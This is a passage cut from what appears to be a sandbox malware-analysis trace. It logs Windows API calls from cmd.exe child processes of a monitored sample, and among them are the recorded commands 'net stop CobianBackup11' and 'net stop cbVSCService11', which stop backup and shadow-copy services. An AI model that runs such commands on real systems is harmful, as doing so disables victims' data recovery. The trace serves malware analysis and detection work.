(_String1=".EXE", _String2=".BAT") returned 3 [0069.636] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.636] GetConsoleTitleW (in: lpConsoleTitle=0x22f1b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.636] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f03c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f104 | out: lpAttributeList=0x22f03c, lpSize=0x22f104) returned 1 [0069.637] UpdateProcThreadAttribute (in: lpAttributeList=0x22f03c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f0fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f03c, lpPreviousValue=0x0) returned 1 [0069.637] GetStartupInfoW (in: lpStartupInfo=0x22eff8 | out: lpStartupInfo=0x22eff8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.637] GetProcessHeap () returned 0x550000 [0069.637] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x563488 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.637] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.638] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.638] GetProcessHeap () returned 0x550000 [0069.638] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x563488 | out: hHeap=0x550000) returned 1 [0069.638] GetProcessHeap () returned 0x550000 [0069.638] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa) returned 0x55ff28 [0069.638] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.639] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop CobianBackup11", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x22f098*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop CobianBackup11", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f0e4 | out: lpCommandLine="net stop CobianBackup11", lpProcessInformation=0x22f0e4*(hProcess=0x78, hThread=0x74, dwProcessId=0x928, dwThreadId=0x91c)) returned 1 [0070.045] CloseHandle (hObject=0x74) returned 1 [0070.045] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.045] GetProcessHeap () returned 0x550000 [0070.045] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565f00 | out: hHeap=0x550000) returned 1 [0070.045] GetEnvironmentStringsW () returned 0x565f00* [0070.045] GetProcessHeap () returned 0x550000 [0070.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x5640c0 [0070.045] FreeEnvironmentStringsW (penv=0x565f00) returned 1 [0070.046] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.356] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x22efd8 | out: lpExitCode=0x22efd8*=0x2) returned 1 [0072.356] CloseHandle (hObject=0x78) returned 1 [0072.357] _vsnwprintf (in: _Buffer=0x22f120, _BufferCount=0x13, _Format="%08X", _ArgList=0x22efe4 | out: _Buffer="00000002") returned 8 [0072.357] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.357] GetProcessHeap () returned 0x550000 [0072.357] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5640c0 | out: hHeap=0x550000) returned 1 [0072.357] GetEnvironmentStringsW () returned 0x5640c0* [0072.357] GetProcessHeap () returned 0x550000 [0072.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x5695a8 [0072.357] FreeEnvironmentStringsW (penv=0x5640c0) returned 1 [0072.357] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.357] GetProcessHeap () returned 0x550000 [0072.357] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5695a8 | out: hHeap=0x550000) returned 1 [0072.357] GetEnvironmentStringsW () returned 0x5640c0* [0072.357] GetProcessHeap () returned 0x550000 [0072.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb5c) returned 0x5695a8 [0072.357] FreeEnvironmentStringsW (penv=0x5640c0) returned 1 [0072.357] GetProcessHeap () returned 0x550000 [0072.357] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ff28 | out: hHeap=0x550000) returned 1 [0072.357] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f03c | out: lpAttributeList=0x22f03c) [0072.357] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.357] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.357] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.358] SetConsoleInputExeNameW () returned 0x1 [0072.358] GetConsoleOutputCP () returned 0x1b5 [0072.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.358] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.358] exit (_Code=2) Process: id = "39" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7a0a3000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop cbVSCService11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 159 os_tid = 0x9cc [0069.004] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3cfcf8 | out: lpSystemTimeAsFileTime=0x3cfcf8*(dwLowDateTime=0x97f8eb50, dwHighDateTime=0x1d57b18)) [0069.004] GetCurrentProcessId () returned 0x974 [0069.004] GetCurrentThreadId () returned 0x9cc [0069.004] GetTickCount () returned 0x114b378 [0069.004] QueryPerformanceCounter (in: lpPerformanceCount=0x3cfcf0 | out: lpPerformanceCount=0x3cfcf0*=18922587049) returned 1 [0069.005] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.005] __set_app_type (_Type=0x1) [0069.005] __p__fmode () returned 0x74eb31f4 [0069.005] __p__commode () returned 0x74eb31fc [0069.005] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.006] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.006] GetCurrentThreadId () returned 0x9cc [0069.006] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x60 [0069.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.006] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.006] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3cfc88 | out: phkResult=0x3cfc88*=0x0) returned 0x2 [0069.007] VirtualQuery (in: lpAddress=0x3cfcbf, lpBuffer=0x3cfc58, dwLength=0x1c | out: lpBuffer=0x3cfc58*(BaseAddress=0x3cf000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.007] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x3cfc58, dwLength=0x1c | out: lpBuffer=0x3cfc58*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.007] VirtualQuery (in: lpAddress=0x2d1000, lpBuffer=0x3cfc58, dwLength=0x1c | out: lpBuffer=0x3cfc58*(BaseAddress=0x2d1000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.007] VirtualQuery (in: lpAddress=0x2d3000, lpBuffer=0x3cfc58, dwLength=0x1c | out: lpBuffer=0x3cfc58*(BaseAddress=0x2d3000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.007] VirtualQuery (in: lpAddress=0x3d0000, lpBuffer=0x3cfc58, dwLength=0x1c | out: lpBuffer=0x3cfc58*(BaseAddress=0x3d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0069.007] GetConsoleOutputCP () returned 0x1b5 [0069.007] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.007] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.007] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.007] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.008] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.510] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.510] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.511] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.511] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.511] GetEnvironmentStringsW () returned 0x452038* [0069.512] GetProcessHeap () returned 0x440000 [0069.512] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x452b10 [0069.512] FreeEnvironmentStringsW (penv=0x452038) returned 1 [0069.512] GetProcessHeap () returned 0x440000 [0069.512] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x450c70 [0069.512] GetEnvironmentStringsW () returned 0x452038* [0069.512] GetProcessHeap () returned 0x440000 [0069.512] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x4535e8 [0069.512] FreeEnvironmentStringsW (penv=0x452038) returned 1 [0069.512] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3cebf8 | out: phkResult=0x3cebf8*=0x68) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x0, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x1, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x1, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x0, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x40, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x40, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x40, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.513] RegCloseKey (hKey=0x68) returned 0x0 [0069.513] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3cebf8 | out: phkResult=0x3cebf8*=0x68) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x40, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x1, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x1, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.513] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x0, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.514] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x9, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.514] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x4, lpData=0x3cec04*=0x9, lpcbData=0x3cebfc*=0x4) returned 0x0 [0069.514] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3cec00, lpData=0x3cec04, lpcbData=0x3cebfc*=0x1000 | out: lpType=0x3cec00*=0x0, lpData=0x3cec04*=0x9, lpcbData=0x3cebfc*=0x1000) returned 0x2 [0069.514] RegCloseKey (hKey=0x68) returned 0x0 [0069.514] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb4 [0069.514] srand (_Seed=0x5d97ebb4) [0069.514] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop cbVSCService11" [0069.514] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop cbVSCService11" [0069.514] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.515] GetProcessHeap () returned 0x440000 [0069.515] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x452038 [0069.515] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x452040, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.515] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.515] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.515] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.515] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.515] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.515] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.515] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.515] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.515] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.515] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.515] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.515] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.515] GetProcessHeap () returned 0x440000 [0069.515] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x452b10 | out: hHeap=0x440000) returned 1 [0069.515] GetEnvironmentStringsW () returned 0x452250* [0069.515] GetProcessHeap () returned 0x440000 [0069.515] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae2) returned 0x454bb0 [0069.516] FreeEnvironmentStringsW (penv=0x452250) returned 1 [0069.516] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.516] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.516] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.516] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.516] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.516] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.516] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.516] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.516] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.516] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.516] GetProcessHeap () returned 0x440000 [0069.516] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x4556a0 [0069.516] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3cf9c4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3cf9c4, lpFilePart=0x3cf9c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3cf9c0*="Desktop") returned 0x25 [0069.516] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.516] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3cf740 | out: lpFindFileData=0x3cf740*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x451eb8 [0069.517] FindClose (in: hFindFile=0x451eb8 | out: hFindFile=0x451eb8) returned 1 [0069.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3cf740 | out: lpFindFileData=0x3cf740*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x451eb8 [0069.517] FindClose (in: hFindFile=0x451eb8 | out: hFindFile=0x451eb8) returned 1 [0069.517] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3cf740 | out: lpFindFileData=0x3cf740*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x451eb8 [0069.517] FindClose (in: hFindFile=0x451eb8 | out: hFindFile=0x451eb8) returned 1 [0069.517] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.517] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.518] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.518] GetProcessHeap () returned 0x440000 [0069.518] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x454bb0 | out: hHeap=0x440000) returned 1 [0069.518] GetEnvironmentStringsW () returned 0x4540c0* [0069.518] GetProcessHeap () returned 0x440000 [0069.518] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb36) returned 0x455f00 [0069.518] FreeEnvironmentStringsW (penv=0x4540c0) returned 1 [0069.518] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.518] GetProcessHeap () returned 0x440000 [0069.518] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4556a0 | out: hHeap=0x440000) returned 1 [0069.518] GetProcessHeap () returned 0x440000 [0069.518] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x456a40 [0069.518] GetProcessHeap () returned 0x440000 [0069.518] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, 